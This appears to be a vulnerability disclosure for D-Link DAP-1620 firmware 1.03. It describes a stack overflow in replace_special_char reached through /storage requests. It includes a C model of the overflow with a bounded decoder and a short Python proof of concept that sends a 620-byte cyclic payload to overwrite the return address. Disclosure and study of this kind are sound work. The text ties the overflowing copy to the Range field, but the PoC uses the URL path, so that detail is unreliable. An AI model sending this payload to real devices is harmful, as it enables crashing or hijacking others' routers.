| Firmware Name | Firmware Version | Download Link |
|---|---|---|
| DAP-1620 | DAP_1620_REVA_FIRMWARE_1.03 | https://legacyfiles.us.dlink.com/DAP-1620/REVA/Firmware/DAP-1620_REVA_FIRMWARE_1.03.B08.ZIP |
This vulnerability is a stack-based buffer overflow in the replace_special_char function: the decoded request string overruns a fixed-size stack buffer and corrupts the saved return address, so the function returns to an abnormal address.

When the router receives an HTTP request, the http_request_parse function is called. Within http_request_parse, the check_dws_cookie function is invoked at address 0x414BD0; it checks whether the request path starts with /storage and continues only if it does.

The code then runs memset(input_str, 0, sizeof(input_str)); followed by strcpy(input_str, *(char **)connection->request.http_range);, where input_str is a 1024-byte stack buffer. Neither call bounds the copy, so if the string at connection->request.http_range is 1024 bytes or longer (strcpy also copies the terminating NUL), input_str overflows here; on the device this first overflow shows up as a reboot.

Execution then enters replace_special_char, which decodes %xx sequences from the input and stores the result in output_buffer, a 600-byte stack buffer. If the decoded string is longer than 600 bytes, a second stack overflow occurs in replace_special_char and the saved return address is overwritten. Because %xx decoding never lengthens a string, an input between roughly 600 and 1023 bytes passes the first copy intact and overflows only the second buffer, which is the condition the PoC below targets.

In short, the vulnerability is triggered by an HTTP request to a /storage path whose attacker-controlled string decodes to more than 600 bytes.
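As an added illustration (not code from the original writeup or from the D-Link firmware), the following C models the two-stage copy described above and shows the bounded decoder that replace_special_char should have used. The buffer sizes (1024 and 600) come from the writeup; the %xx decoding rules (malformed escapes copied through literally), the helper names and the classify_request check are assumptions made for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Buffer sizes from the writeup. */
#define INPUT_STR_SIZE     1024   /* input_str in check_dws_cookie */
#define OUTPUT_BUFFER_SIZE  600   /* output_buffer in replace_special_char */

enum overflow_stage {
    NO_OVERFLOW = 0,
    INPUT_STR_OVERFLOW = 1,      /* strcpy() into input_str overruns (reboot) */
    OUTPUT_BUFFER_OVERFLOW = 2   /* decoded string overruns output_buffer (return address) */
};

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Consume one %xx-decoded byte from *p and advance the cursor.  A malformed
 * escape ("%zz", "%4", trailing "%") is passed through as a literal '%';
 * that is an assumption about the firmware's decoder, not something the
 * writeup states.  Caller guarantees **p != '\0'. */
static int next_decoded_byte(const char **p)
{
    const char *s = *p;
    if (s[0] == '%' && s[1] != '\0' && s[2] != '\0') {
        int hi = hexval((unsigned char)s[1]);
        int lo = hexval((unsigned char)s[2]);
        if (hi >= 0 && lo >= 0) {
            *p = s + 3;
            return (hi << 4) | lo;
        }
    }
    *p = s + 1;
    return (unsigned char)s[0];
}

/* Bytes the unbounded decoder would write, excluding the terminating NUL. */
size_t decoded_length(const char *in)
{
    size_t n = 0;
    while (*in != '\0') {
        next_decoded_byte(&in);
        n++;
    }
    return n;
}

/* Which stack buffer a request field overruns, in the order the writeup gives:
 * strcpy() into the 1024-byte input_str first, then %xx decoding into the
 * 600-byte output_buffer.  Both checks count the NUL, so a string whose length
 * equals the buffer size already writes one byte past the end. */
int classify_request(const char *field)
{
    if (strlen(field) >= INPUT_STR_SIZE)
        return INPUT_STR_OVERFLOW;
    if (decoded_length(field) >= OUTPUT_BUFFER_SIZE)
        return OUTPUT_BUFFER_OVERFLOW;
    return NO_OVERFLOW;
}

/* Hardened decode step: writes at most out_size-1 bytes plus the terminator.
 * Returns the decoded length, or -1 (and an empty output) if it would not fit. */
int decode_percent_bounded(const char *in, char *out, size_t out_size)
{
    size_t n = 0;
    if (out_size == 0)
        return -1;
    while (*in != '\0') {
        int c = next_decoded_byte(&in);
        if (n + 1 >= out_size) {       /* no room for this byte plus the NUL */
            out[0] = '\0';
            return -1;
        }
        out[n++] = (char)c;
    }
    out[n] = '\0';
    return (int)n;
}

/* Demo helpers: an output buffer of the vulnerable size and a filler builder
 * (constructed inputs, standing in for the PoC's cyclic pattern). */
static char g_out[OUTPUT_BUFFER_SIZE];
static char g_filler[INPUT_STR_SIZE + 256];

const char *make_filler(size_t len)
{
    if (len >= sizeof g_filler)
        len = sizeof g_filler - 1;
    memset(g_filler, 'A', len);
    g_filler[len] = '\0';
    return g_filler;
}

int decode_into_demo_buffer(const char *in)
{
    return decode_percent_bounded(in, g_out, sizeof g_out);
}

const char *demo_buffer(void) { return g_out; }

int main(void)
{
    const char *short_path = "/storage/%2e%2e/x";   /* constructed sample */
    printf("short: decoded=%zu stage=%d\n", decoded_length(short_path), classify_request(short_path));
    const char *f620 = make_filler(620);
    printf("620xA: decoded=%zu stage=%d\n", decoded_length(f620), classify_request(f620));
    printf("bounded decode of 620xA -> %d\n", decode_into_demo_buffer(f620));
    const char *f1100 = make_filler(1100);
    printf("1100xA: stage=%d\n", classify_request(f1100));
    return 0;
}
```

Running it classifies the PoC's 620-byte filler as an output_buffer overflow (it survives the first copy) and a 1100-byte string as an input_str overflow, while the bounded decoder refuses the 620-byte input instead of writing past the 600-byte buffer.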
```python
import requests
from pwn import *

ip = "172.17.0.3"
port = 80
# 620 bytes: fits the 1024-byte input_str but, once decoded, overflows the
# 600-byte output_buffer in replace_special_char.
payload = cyclic(620).decode("utf-8")
url = f"http://{ip}:{port}/storage/{payload}?"
print(requests.get(url, timeout=10).text)
```
The vulnerability was discovered by Professor Wei Zhou's team (IoTS&P Lab) from the School of Cyber Science and Engineering at Huazhong University of Science and Technology.